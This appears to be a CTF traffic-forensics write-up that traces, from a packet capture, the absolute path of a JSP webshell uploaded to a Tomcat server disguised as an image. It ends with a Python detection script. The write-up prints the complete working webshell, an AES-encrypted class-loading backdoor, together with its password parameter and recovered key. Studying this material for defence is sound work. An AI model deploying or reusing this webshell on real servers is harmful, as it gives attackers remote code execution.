Challenge description #
Level description: What is the absolute path of the webshell the attacker uploaded?
Flag #
tcp.stream eq 51
POST /api/upload HTTP/1.1
Host: 202.1.1.66:8080
{"msg":"..................http://202.1.1.66:8080/static/s74e7vwmzs21d5x6.jsp","code":0,"url":"http://202.1.1.66:8080/static/s74e7vwmzs21d5x6.jsp"}
Without access to the target machine, we have to reason it out from the capture.
tcp.stream eq 51
POST /api/upload HTTP/1.1
Host: 202.1.1.66:8080
--628c1882-2027-4c85-a009-e4cd41af99a9
Content-Disposition: form-data; name="avatar"; filename="pic.jsp"
Content-Type: image/jpeg
Content-Length: 17
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("bing_pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
--628c1882-2027-4c85-a009-e4cd41af99a9--
First we find the password: bing_pass (the request parameter the JSP checks to start the key handshake)
ip.addr == 202.1.1.66 && http.request.method == "POST" && http.request.uri contains "s74e7vwmzs21d5x6"
tcp.stream eq 76
b99f657b04941030 # key
BlueTeamTools, "decrypt webshell traffic": using the recovered key and password, the packet of the webshell's first successful connection decrypts successfully.
Raw data
86a6e613cecd45be680facdb95830327a565f74aa74d7aa9e80eaf710f0ff70868cdf542d12cd5f72f1bd …… 5363ab6626393e70ef5793c33d5a05d22c6de
CATALINA_HOME=/usr/local/tomcat
/usr/local/tomcat/webapps
The site is reached as IP:PORT with no context path, so the JSP is written under
/usr/local/tomcat/webapps/ROOT
Putting the pieces together:
/usr/local/tomcat/webapps/ROOT/static/s74e7vwmzs21d5x6.jsp
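As an added example (not part of the original write-up), this script does in Python the upload-side correlation described above: it parses the multipart POST from the capture, flags an "image" upload that carries JSP scriptlets and the bing_pass handshake, and maps the URL in the JSON response onto the deployed file under the assumed webroot /usr/local/tomcat/webapps/ROOT. The sample request is constructed to match the capture, with a shortened JSP body and an assumed Content-Type request header.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample modelled on tcp.stream 51 from this write-up: the JSP body is cut down to
# the fragments the heuristics look at, and the Content-Type request header is assumed.
UPLOAD_REQUEST = (
    "POST /api/upload HTTP/1.1\r\n"
    "Host: 202.1.1.66:8080\r\n"
    "Content-Type: multipart/form-data; boundary=628c1882-2027-4c85-a009-e4cd41af99a9\r\n"
    "\r\n"
    "--628c1882-2027-4c85-a009-e4cd41af99a9\r\n"
    'Content-Disposition: form-data; name="avatar"; filename="pic.jsp"\r\n'
    "Content-Type: image/jpeg\r\n"
    "\r\n"
    '<%@page import="javax.crypto.*"%><%!class U extends ClassLoader{Class g(byte[]b){return super.defineClass(b,0,b.length);}}%>'
    '<%if(request.getParameter("bing_pass")!=null){return;}Cipher c=Cipher.getInstance("AES");%>\r\n'
    "--628c1882-2027-4c85-a009-e4cd41af99a9--\r\n"
)
UPLOAD_RESPONSE = '{"msg":"ok","code":0,"url":"http://202.1.1.66:8080/static/s74e7vwmzs21d5x6.jsp"}'
# Traits that mark the uploaded file as a class-loading, AES-speaking JSP shell.
SCRIPT_MARKERS = ("<%", "defineClass", "Cipher.getInstance", "bing_pass")

def parse_multipart(raw: str) -> list:
    """Split a raw multipart/form-data request into its parts (headers dict, filename, body)."""
    head, body = raw.split("\r\n\r\n", 1)
    boundary = re.search(r"boundary=([^;\r\n]+)", head).group(1)
    parts = []
    for chunk in body.split("--" + boundary)[1:]:
        if chunk.startswith("--"):  # closing delimiter, nothing follows it
            break
        part_head, part_body = chunk.strip("\r\n").split("\r\n\r\n", 1)
        headers = {k.lower(): v for k, v in (h.split(": ", 1) for h in part_head.split("\r\n"))}
        match = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
        parts.append({"headers": headers, "filename": match.group(1) if match else "", "body": part_body})
    return parts

def inspect_upload(request: str, response: str, webroot: str) -> dict:
    """Correlate the upload with its JSON response and map the served URL onto the on-disk path under webroot."""
    part = parse_multipart(request)[0]
    url = json.loads(response)["url"]
    markers = [m for m in SCRIPT_MARKERS if m in part["body"]]
    return {
        "filename": part["filename"],
        "declared_type": part["headers"].get("content-type", ""),
        "script_markers": markers,
        "suspicious": bool(markers) or part["filename"].lower().endswith((".jsp", ".jspx")),
        "abs_path": webroot.rstrip("/") + urlparse(url).path,
    }
```

The declared image/jpeg type against a .jsp filename full of scriptlets is the detection signal; the abs_path is the answer only under the assumption that the app is deployed as Tomcat's ROOT context.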